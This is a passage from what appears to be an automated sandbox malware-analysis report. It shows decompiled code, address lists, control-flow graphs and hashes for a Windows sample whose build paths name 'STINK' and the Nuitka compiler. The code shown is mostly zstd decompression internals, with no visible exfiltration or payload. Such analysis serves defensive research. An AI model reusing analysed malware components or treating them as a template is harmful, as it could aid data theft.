                                                                                                                                                                								goto L29;
                                                                                                                                                                							}
                                                                                                                                                                							L10:
                                                                                                                                                                							if(__rbp == __rsi) {
                                                                                                                                                                								goto L13;
                                                                                                                                                                							}
                                                                                                                                                                							__rax = __rcx;
                                                                                                                                                                							__r8 = __rsi;
                                                                                                                                                                							__rax = __rcx >> 3;
                                                                                                                                                                							__rdx = __rax;
                                                                                                                                                                							__r8 = __rsi - __rax;
                                                                                                                                                                							if(__rbp <= __r8) {
                                                                                                                                                                								__rdx = __rax * 8;
                                                                                                                                                                								__r15 =  *__r8;
                                                                                                                                                                								__rax = __rcx;
                                                                                                                                                                								__rsi = __r8;
                                                                                                                                                                								__rax = __rcx - __rdx;
                                                                                                                                                                								 *(__rsp + 0x48) = __rax;
                                                                                                                                                                								 *(__rsp + 0x40) = __r15;
                                                                                                                                                                								if(__rbx > __r9) {
                                                                                                                                                                									goto L13;
                                                                                                                                                                								}
                                                                                                                                                                								if(r12d == 0) {
                                                                                                                                                                									goto L34;
                                                                                                                                                                								}
                                                                                                                                                                								goto L29;
                                                                                                                                                                							}
                                                                                                                                                                							__rax = __rsi;
                                                                                                                                                                							__rax = __rsi - __rbp;
                                                                                                                                                                							__rdx = __rax;
                                                                                                                                                                							__rax = __rax << 3;
                                                                                                                                                                							__rsi = __rsi - __rdx;
                                                                                                                                                                							__rcx = __rcx - __rax;
                                                                                                                                                                							__rax =  *__rsi;
                                                                                                                                                                							 *(__rsp + 0x48) = __rcx;
                                                                                                                                                                							 *(__rsp + 0x40) =  *__rsi;
                                                                                                                                                                							goto L13;
                                                                                                                                                                						}
                                                                                                                                                                						if(__r14 == __rbp) {
                                                                                                                                                                							goto L39;
                                                                                                                                                                						}
                                                                                                                                                                						__rdx = __rax;
                                                                                                                                                                						__rcx = __rbp;
                                                                                                                                                                						__rdx = __rax >> 3;
                                                                                                                                                                						r8d = __edx;
                                                                                                                                                                						__rcx = __rbp - __r8;
                                                                                                                                                                						if(__r14 <= __rcx) {
                                                                                                                                                                							__rdx = __rdx << 3;
                                                                                                                                                                							__r13 =  *__rcx;
                                                                                                                                                                							 *(__rsp + 0x48) = __rax;
                                                                                                                                                                							r15d = __eax;
                                                                                                                                                                							__rax =  *((intOrPtr*)(__rsp + 0x20));
                                                                                                                                                                							 *(__rsp + 0x40) = __r13;
                                                                                                                                                                							__rax =  *((intOrPtr*)(__rsp + 0x20)) - 7;
                                                                                                                                                                							if(__rbx >=  *((intOrPtr*)(__rsp + 0x20)) - 7) {
                                                                                                                                                                								__rbp = __r14;
                                                                                                                                                                								__rsi = __rcx;
                                                                                                                                                                								__r14 =  *(__rsp + 0x28);
                                                                                                                                                                								goto L8;
                                                                                                                                                                							}
                                                                                                                                                                							__rbp = __rcx;
                                                                                                                                                                							goto L22;
                                                                                                                                                                						}
                                                                                                                                                                						__rsi = __rbp;
                                                                                                                                                                						__rbp = __r14;
                                                                                                                                                                						__r14 =  *(__rsp + 0x28);
                                                                                                                                                                						__rdx = __rsi;
                                                                                                                                                                						__rdx = __rsi - __rbp;
                                                                                                                                                                						__rcx = __rdx;
                                                                                                                                                                						__rax = __rax - __rdx;
                                                                                                                                                                						__rsi = __rsi - __rcx;
                                                                                                                                                                						 *(__rsp + 0x48) = __rax;
                                                                                                                                                                						__rax =  *__rsi;
                                                                                                                                                                						 *(__rsp + 0x40) =  *__rsi;
                                                                                                                                                                						goto L8;
                                                                                                                                                                						L25:
                                                                                                                                                                						__r13 = __r13 << __cl;
                                                                                                                                                                						__rcx = __rsi;
                                                                                                                                                                						__rdx = __rdi + __r13 * 4;
                                                                                                                                                                						__rax =  *__rdx & 0x0000ffff;
                                                                                                                                                                						 *__rbx = __ax;
                                                                                                                                                                						__rax =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                						__rdx =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                						__eax = __eax + r15d;
                                                                                                                                                                						 *(__rsp + 0x48) = __rax;
                                                                                                                                                                						__rbx = __rbx + __rdx;
                                                                                                                                                                					} while (__rax <= 0x40);
                                                                                                                                                                					__rax =  *((intOrPtr*)(__rsp + 0x20));
                                                                                                                                                                					__rsi = __rbp;
                                                                                                                                                                					__rbp = __r14;
                                                                                                                                                                					__r9 =  *((intOrPtr*)(__rsp + 0x20)) - 2;
                                                                                                                                                                					goto L13;
                                                                                                                                                                				}
                                                                                                                                                                				L1:
                                                                                                                                                                				return _t113;
                                                                                                                                                                			}






                                                                                                                                                                0x00409f80
                                                                                                                                                                0x00409fc2
                                                                                                                                                                0x00409fc9
                                                                                                                                                                0x00409fcf
                                                                                                                                                                0x00409fd2
                                                                                                                                                                0x00409fdb
                                                                                                                                                                0x00409fdf
                                                                                                                                                                0x00409fe7
                                                                                                                                                                0x00409fea
                                                                                                                                                                0x00409fed
                                                                                                                                                                0x00409ff0
                                                                                                                                                                0x00409ff3
                                                                                                                                                                0x00409ff8
                                                                                                                                                                0x00409ffb
                                                                                                                                                                0x00409ffd
                                                                                                                                                                0x0040a002
                                                                                                                                                                0x0040a00a
                                                                                                                                                                0x0040a00e
                                                                                                                                                                0x0040a012
                                                                                                                                                                0x0040a015
                                                                                                                                                                0x0040a01a
                                                                                                                                                                0x0040a01d
                                                                                                                                                                0x0040a020
                                                                                                                                                                0x0040a023
                                                                                                                                                                0x0040a02a
                                                                                                                                                                0x0040a030
                                                                                                                                                                0x0040a035
                                                                                                                                                                0x0040a3e0
                                                                                                                                                                0x0040a3e2
                                                                                                                                                                0x0040a3e5
                                                                                                                                                                0x0040a3e8
                                                                                                                                                                0x0040a3ec
                                                                                                                                                                0x0040a3ef
                                                                                                                                                                0x0040a3f4
                                                                                                                                                                0x0040a3f7
                                                                                                                                                                0x0040a3fb
                                                                                                                                                                0x0040a3ff
                                                                                                                                                                0x0040a407
                                                                                                                                                                0x0040a189
                                                                                                                                                                0x0040a18c
                                                                                                                                                                0x0040a3c0
                                                                                                                                                                0x0040a3c6
                                                                                                                                                                0x0040a3cd
                                                                                                                                                                0x0040a3d4
                                                                                                                                                                0x0040a3d4
                                                                                                                                                                0x0040a198
                                                                                                                                                                0x0040a19b
                                                                                                                                                                0x0040a19d
                                                                                                                                                                0x0040a1a0
                                                                                                                                                                0x0040a1a4
                                                                                                                                                                0x0040a1a7
                                                                                                                                                                0x0040a1aa
                                                                                                                                                                0x0040a1ae
                                                                                                                                                                0x0040a1b1
                                                                                                                                                                0x0040a1bb
                                                                                                                                                                0x0040a1be
                                                                                                                                                                0x0040a1c0
                                                                                                                                                                0x0040a1c3
                                                                                                                                                                0x0040a1c6
                                                                                                                                                                0x0040a1cd
                                                                                                                                                                0x0040a318
                                                                                                                                                                0x0040a31f
                                                                                                                                                                0x0040a324
                                                                                                                                                                0x0040a32a
                                                                                                                                                                0x0040a331
                                                                                                                                                                0x0040a338
                                                                                                                                                                0x0040a33d
                                                                                                                                                                0x0040a340
                                                                                                                                                                0x0040a345
                                                                                                                                                                0x0040a34a
                                                                                                                                                                0x0040a350
                                                                                                                                                                0x0040a357
                                                                                                                                                                0x0040a35e
                                                                                                                                                                0x0040a362
                                                                                                                                                                0x0040a365
                                                                                                                                                                0x0040a36a
                                                                                                                                                                0x0040a36d
                                                                                                                                                                0x0040a372
                                                                                                                                                                0x0040a375
                                                                                                                                                                0x0040a37b
                                                                                                                                                                0x0040a37e
                                                                                                                                                                0x0040a383
                                                                                                                                                                0x0040a386
                                                                                                                                                                0x0040a388
                                                                                                                                                                0x0040a38e
                                                                                                                                                                0x0040a391
                                                                                                                                                                0x0040a398
                                                                                                                                                                0x0040a39c
                                                                                                                                                                0x0040a39f
                                                                                                                                                                0x0040a3a2
                                                                                                                                                                0x0040a3a6
                                                                                                                                                                0x0040a3a9
                                                                                                                                                                0x0040a3ad
                                                                                                                                                                0x0040a3b4
                                                                                                                                                                0x0040a3b7
                                                                                                                                                                0x0040a1d3
                                                                                                                                                                0x0040a1d3
                                                                                                                                                                0x0040a1d7
                                                                                                                                                                0x0040a1da
                                                                                                                                                                0x0040a1dd
                                                                                                                                                                0x0040a1e2
                                                                                                                                                                0x0040a1e5
                                                                                                                                                                0x0040a1ed
                                                                                                                                                                0x0040a1f0
                                                                                                                                                                0x0040a1f2
                                                                                                                                                                0x0040a1f5
                                                                                                                                                                0x0040a1f8
                                                                                                                                                                0x0040a1fc
                                                                                                                                                                0x0040a1ff
                                                                                                                                                                0x0040a202
                                                                                                                                                                0x0040a206
                                                                                                                                                                0x0040a209
                                                                                                                                                                0x0040a20d
                                                                                                                                                                0x0040a20d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a1cd
                                                                                                                                                                0x0040a410
                                                                                                                                                                0x0040a410
                                                                                                                                                                0x0040a413
                                                                                                                                                                0x0040a416
                                                                                                                                                                0x0040a082
                                                                                                                                                                0x0040a082
                                                                                                                                                                0x0040a087
                                                                                                                                                                0x0040a08b
                                                                                                                                                                0x0040a092
                                                                                                                                                                0x0040a0df
                                                                                                                                                                0x0040a0e2
                                                                                                                                                                0x0040a5a5
                                                                                                                                                                0x0040a144
                                                                                                                                                                0x0040a147
                                                                                                                                                                0x0040a56d
                                                                                                                                                                0x0040a575
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a57b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a147
                                                                                                                                                                0x0040a5ab
                                                                                                                                                                0x0040a5b3
                                                                                                                                                                0x0040a511
                                                                                                                                                                0x0040a511
                                                                                                                                                                0x0040a515
                                                                                                                                                                0x0040a518
                                                                                                                                                                0x0040a51a
                                                                                                                                                                0x0040a520
                                                                                                                                                                0x0040a522
                                                                                                                                                                0x0040a525
                                                                                                                                                                0x0040a529
                                                                                                                                                                0x0040a52c
                                                                                                                                                                0x0040a532
                                                                                                                                                                0x0040a596
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a596
                                                                                                                                                                0x0040a537
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a541
                                                                                                                                                                0x0040a546
                                                                                                                                                                0x0040a5ca
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a5ca
                                                                                                                                                                0x0040a54c
                                                                                                                                                                0x0040a557
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a55d
                                                                                                                                                                0x0040a5b9
                                                                                                                                                                0x0040a5c0
                                                                                                                                                                0x0040a4f1
                                                                                                                                                                0x0040a4f1
                                                                                                                                                                0x0040a4f6
                                                                                                                                                                0x0040a4fc
                                                                                                                                                                0x0040a503
                                                                                                                                                                0x0040a50a
                                                                                                                                                                0x0040a50c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a50c
                                                                                                                                                                0x0040a0e8
                                                                                                                                                                0x0040a0eb
                                                                                                                                                                0x0040a0f0
                                                                                                                                                                0x0040a0f5
                                                                                                                                                                0x0040a0f8
                                                                                                                                                                0x0040a0ff
                                                                                                                                                                0x0040a450
                                                                                                                                                                0x0040a457
                                                                                                                                                                0x0040a45c
                                                                                                                                                                0x0040a463
                                                                                                                                                                0x0040a466
                                                                                                                                                                0x0040a46e
                                                                                                                                                                0x0040a471
                                                                                                                                                                0x0040a474
                                                                                                                                                                0x0040a479
                                                                                                                                                                0x0040a481
                                                                                                                                                                0x0040a484
                                                                                                                                                                0x0040a487
                                                                                                                                                                0x0040a490
                                                                                                                                                                0x0040a490
                                                                                                                                                                0x0040a497
                                                                                                                                                                0x0040a49a
                                                                                                                                                                0x0040a4a0
                                                                                                                                                                0x0040a4a2
                                                                                                                                                                0x0040a4a7
                                                                                                                                                                0x0040a4ad
                                                                                                                                                                0x0040a4b0
                                                                                                                                                                0x0040a4b4
                                                                                                                                                                0x0040a4b7
                                                                                                                                                                0x0040a4bb
                                                                                                                                                                0x0040a4bf
                                                                                                                                                                0x0040a4c3
                                                                                                                                                                0x0040a4c5
                                                                                                                                                                0x0040a4c8
                                                                                                                                                                0x0040a4cc
                                                                                                                                                                0x0040a4d1
                                                                                                                                                                0x0040a4d4
                                                                                                                                                                0x0040a4d9
                                                                                                                                                                0x0040a4de
                                                                                                                                                                0x0040a4eb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a4eb
                                                                                                                                                                0x0040a108
                                                                                                                                                                0x0040a10e
                                                                                                                                                                0x0040a114
                                                                                                                                                                0x0040a117
                                                                                                                                                                0x0040a11b
                                                                                                                                                                0x0040a11e
                                                                                                                                                                0x0040a121
                                                                                                                                                                0x0040a125
                                                                                                                                                                0x0040a129
                                                                                                                                                                0x0040a12c
                                                                                                                                                                0x0040a12f
                                                                                                                                                                0x0040a134
                                                                                                                                                                0x0040a13e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a13e
                                                                                                                                                                0x0040a094
                                                                                                                                                                0x0040a099
                                                                                                                                                                0x0040a09c
                                                                                                                                                                0x0040a0a2
                                                                                                                                                                0x0040a2b8
                                                                                                                                                                0x0040a2ba
                                                                                                                                                                0x0040a2bd
                                                                                                                                                                0x0040a2c0
                                                                                                                                                                0x0040a2c2
                                                                                                                                                                0x0040a2c5
                                                                                                                                                                0x0040a2c8
                                                                                                                                                                0x0040a2cc
                                                                                                                                                                0x0040a2d4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a2dd
                                                                                                                                                                0x0040a280
                                                                                                                                                                0x0040a280
                                                                                                                                                                0x0040a282
                                                                                                                                                                0x0040a28b
                                                                                                                                                                0x0040a28f
                                                                                                                                                                0x0040a292
                                                                                                                                                                0x0040a295
                                                                                                                                                                0x0040a299
                                                                                                                                                                0x0040a29b
                                                                                                                                                                0x0040a29f
                                                                                                                                                                0x0040a2a3
                                                                                                                                                                0x0040a2a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a2b2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a2b2
                                                                                                                                                                0x0040a2e0
                                                                                                                                                                0x0040a2e0
                                                                                                                                                                0x0040a2e5
                                                                                                                                                                0x0040a2eb
                                                                                                                                                                0x0040a2f2
                                                                                                                                                                0x0040a2f9
                                                                                                                                                                0x0040a2fd
                                                                                                                                                                0x0040a303
                                                                                                                                                                0x0040a308
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a308
                                                                                                                                                                0x0040a0a8
                                                                                                                                                                0x0040a0ab
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a0ad
                                                                                                                                                                0x0040a0af
                                                                                                                                                                0x0040a0b2
                                                                                                                                                                0x0040a0b5
                                                                                                                                                                0x0040a0b7
                                                                                                                                                                0x0040a0bd
                                                                                                                                                                0x0040a258
                                                                                                                                                                0x0040a25f
                                                                                                                                                                0x0040a262
                                                                                                                                                                0x0040a264
                                                                                                                                                                0x0040a267
                                                                                                                                                                0x0040a269
                                                                                                                                                                0x0040a26d
                                                                                                                                                                0x0040a275
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a27e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a27e
                                                                                                                                                                0x0040a0c3
                                                                                                                                                                0x0040a0c6
                                                                                                                                                                0x0040a0c9
                                                                                                                                                                0x0040a0cb
                                                                                                                                                                0x0040a0ce
                                                                                                                                                                0x0040a0d1
                                                                                                                                                                0x0040a0d3
                                                                                                                                                                0x0040a0d6
                                                                                                                                                                0x0040a0da
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a0da
                                                                                                                                                                0x0040a03e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a044
                                                                                                                                                                0x0040a046
                                                                                                                                                                0x0040a049
                                                                                                                                                                0x0040a04c
                                                                                                                                                                0x0040a04f
                                                                                                                                                                0x0040a055
                                                                                                                                                                0x0040a160
                                                                                                                                                                0x0040a163
                                                                                                                                                                0x0040a168
                                                                                                                                                                0x0040a16c
                                                                                                                                                                0x0040a16f
                                                                                                                                                                0x0040a174
                                                                                                                                                                0x0040a179
                                                                                                                                                                0x0040a180
                                                                                                                                                                0x0040a5d3
                                                                                                                                                                0x0040a5d6
                                                                                                                                                                0x0040a5d9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a5d9
                                                                                                                                                                0x0040a186
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a186
                                                                                                                                                                0x0040a05b
                                                                                                                                                                0x0040a05e
                                                                                                                                                                0x0040a061
                                                                                                                                                                0x0040a066
                                                                                                                                                                0x0040a069
                                                                                                                                                                0x0040a06c
                                                                                                                                                                0x0040a071
                                                                                                                                                                0x0040a073
                                                                                                                                                                0x0040a076
                                                                                                                                                                0x0040a07a
                                                                                                                                                                0x0040a07d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a210
                                                                                                                                                                0x0040a213
                                                                                                                                                                0x0040a216
                                                                                                                                                                0x0040a21b
                                                                                                                                                                0x0040a21f
                                                                                                                                                                0x0040a222
                                                                                                                                                                0x0040a225
                                                                                                                                                                0x0040a229
                                                                                                                                                                0x0040a22d
                                                                                                                                                                0x0040a230
                                                                                                                                                                0x0040a234
                                                                                                                                                                0x0040a237
                                                                                                                                                                0x0040a240
                                                                                                                                                                0x0040a245
                                                                                                                                                                0x0040a248
                                                                                                                                                                0x0040a24b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040a24b
                                                                                                                                                                0x00409f4a
                                                                                                                                                                0x00409f5d

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: @$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
                                                                                                                                                                • API String ID: 1222420520-4253846632
                                                                                                                                                                • Opcode ID: 39d56ed74ea76d0f69db474449229fa27085fd191f935673ac11919e4a8f903e
                                                                                                                                                                • Instruction ID: f0c065cc3a5bce39441e07e8ff2809526860d5fa6bbcd36b91e92bab7fc77e2d
                                                                                                                                                                • Opcode Fuzzy Hash: 39d56ed74ea76d0f69db474449229fa27085fd191f935673ac11919e4a8f903e
                                                                                                                                                                • Instruction Fuzzy Hash: 0EE1D6B27046D487CB24CF29E40036EBBA1F385BC4F588126EB9A97B98DB3CC555DB05
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 952 4016d0-4016f4 GetModuleHandleA 953 401750-40175e 952->953 954 4016f6-401736 LoadLibraryA GetProcAddress * 2 952->954 955 401765-401775 953->955 954->955 956 401738-401747 954->956 955->956 956->953
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                • String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                                                                                                                                                                • API String ID: 384173800-1835852900
                                                                                                                                                                • Opcode ID: a0c44292f4beecbb601586e794bac24e9fac3c25c3d2c687564f34cade012740
                                                                                                                                                                • Instruction ID: c1e48f54d906c92f685e670f17b047aa54a3a702cd6dd2812bd3e11e21ff2b72
                                                                                                                                                                • Opcode Fuzzy Hash: a0c44292f4beecbb601586e794bac24e9fac3c25c3d2c687564f34cade012740
                                                                                                                                                                • Instruction Fuzzy Hash: D001C4A0712A09D1EE25DF15FC50B9427A4BB54788F890A26EF4D13374EF3CC65AD348
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
                                                                                                                                                                • API String ID: 0-1700488978
                                                                                                                                                                • Opcode ID: b12d22be6a0486c8e286cca36a3ed30c7224da01f5fc414da9536f9f799bfcd1
                                                                                                                                                                • Instruction ID: 274311f34bfcdc754e6c743467be3d12ba0802f2be7adcb4fed12ddfcf3b9b22
                                                                                                                                                                • Opcode Fuzzy Hash: b12d22be6a0486c8e286cca36a3ed30c7224da01f5fc414da9536f9f799bfcd1
                                                                                                                                                                • Instruction Fuzzy Hash: FCB1EA72309BD442C7108F1AE95075EBB62F385BD0F45822AEBAE17BD9DA7DC528C704
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 637 4018b0-4018e4 638 401a58-401a5b 637->638 639 4018ea-4018f2 637->639 642 401a61-401a65 638->642 643 401ae8-401b06 _assert 638->643 640 4018f4-4018f7 639->640 641 4018fd-401901 639->641 640->641 646 401c30-401c4e _assert 640->646 645 401b0c-401b0f 641->645 647 401907-40190a 641->647 644 401a6b-401a6e 642->644 642->645 643->644 643->645 653 401e60-401e74 _assert 644->653 654 401a74-401a78 644->654 648 401a43-401a53 645->648 649 401b15-401b2c 645->649 646->645 650 401c54-401c57 646->650 651 401c60-401c68 647->651 652 401910-401913 647->652 655 401b32-401b36 649->655 656 401f68-401f6a 649->656 657 401d30-401d3a 650->657 658 401c5d 650->658 659 401c6a-401c6e 651->659 660 401c7e-401c82 651->660 652->657 661 401919-40191c 652->661 669 401e80-401e88 653->669 662 401e20-401e58 654->662 663 401a7e-401a96 654->663 655->656 670 401b3c-401b40 655->670 666 401f70-401f7e 656->666 667 401d50-401d54 657->667 668 401d3c-401d40 657->668 658->651 671 401c74-401c78 659->671 672 401f85-401f9f _assert 659->672 660->669 674 401c88-401c8c 660->674 661->648 673 401922-401942 661->673 662->653 664 401f28-401f5a _assert * 2 663->664 665 401a9c-401a9f 663->665 664->656 665->647 675 401aa5-401abf _assert 665->675 666->666 676 401f80 666->676 679 401ed8-401ee0 667->679 680 401d5a-401d5e 667->680 677 401fa4-401fbe _assert 668->677 678 401d46-401d4a 668->678 681 401fc3-401fd7 _assert 669->681 682 401e8e-401e99 669->682 683 401b46-401b4f 670->683 684 40200e-402014 670->684 671->660 671->672 672->660 685 401ad0-401ada 673->685 686 401948-401952 673->686 674->669 687 401c92-401cac 674->687 675->647 676->648 677->667 678->667 678->677 694 401fe2-401ff6 _assert 679->694 695 401ee6-401ef1 679->695 680->679 690 401d64-401d7d 680->690 681->694 682->648 693 401e9f-401ea7 682->693 691 401b50-401b60 683->691 699 40201b-40201e 684->699 688 401ac8-401acc 685->688 689 401adc 685->689 686->685 692 401958-40196e 686->692 696 401cb2-401cc3 687->696 697 401e04-401e15 687->697 688->685 689->648 690->699 702 401d83-401d94 690->702 691->691 704 401b62-401b74 691->704 705 402001-402007 692->705 706 401974-40197d 692->706 703 401eb0-401ecc 693->703 694->705 707 401df3-401df6 695->707 708 401ef7-401eff 695->708 696->697 698 401cc9-401ce9 696->698 700 401e00 697->700 701 401e17 697->701 710 401cf0-401d00 698->710 714 402020-402032 699->714 700->697 701->648 702->699 711 401d9a-401dba 702->711 703->703 715 401ece 703->715 704->648 712 401b7a-401b87 704->712 705->684 713 401980-401990 706->713 707->700 709 401f00-401f1c 708->709 709->709 717 401f1e 709->717 710->710 718 401d02-401d1a 710->718 720 401dc0-401dd0 711->720 721 401ba7-401bb3 712->721 722 401b89-401ba1 712->722 713->713 716 401992-4019a4 713->716 714->714 719 402034 714->719 715->648 716->648 726 4019aa-4019bb 716->726 717->707 718->648 723 401d20-401d26 718->723 719->707 720->720 724 401dd2-401deb 720->724 721->648 725 401bb9-401bc7 721->725 722->648 722->721 723->648 724->707 730 401ded-401df0 724->730 725->648 727 401bcd-401bdb 725->727 728 4019d7-4019e4 726->728 729 4019bd-4019d5 726->729 727->648 731 401be1-401bef 727->731 728->648 732 4019e6-4019f5 728->732 729->648 729->728 730->707 731->648 733 401bf5-401c03 731->733 732->648 734 4019f7-401a06 732->734 733->648 735 401c09-401c17 733->735 734->648 736 401a08-401a17 734->736 735->648 737 401c1d-401c24 735->737 736->648 738 401a19-401a28 736->738 737->648 738->648 739 401a2a-401a39 738->739 739->648 740 401a3b-401a40 739->740 740->648
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: (ovtype == ZSTD_no_overlap && (diff <= -8 || diff >= 8 || op >= oend_w)) || (ovtype == ZSTD_overlap_src_before_dst && diff >= 0)$*ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$op - ip >= 8$op <= oend
                                                                                                                                                                • API String ID: 1222420520-2145626313
                                                                                                                                                                • Opcode ID: a7eb3c1a949c88e6a7b41b4bbe2427496fdce6e855ba42ccb470643663ad8da6
                                                                                                                                                                • Instruction ID: 8fa36b38b05cd7df7b9a7335e3154dac448878c4685e51b9ba02bff09dc44b8f
                                                                                                                                                                • Opcode Fuzzy Hash: a7eb3c1a949c88e6a7b41b4bbe2427496fdce6e855ba42ccb470643663ad8da6
                                                                                                                                                                • Instruction Fuzzy Hash: 600209A2B1A69486DF108F29D4003AD7B62E755BD4F88C233DB69177E5EB7CC649C304
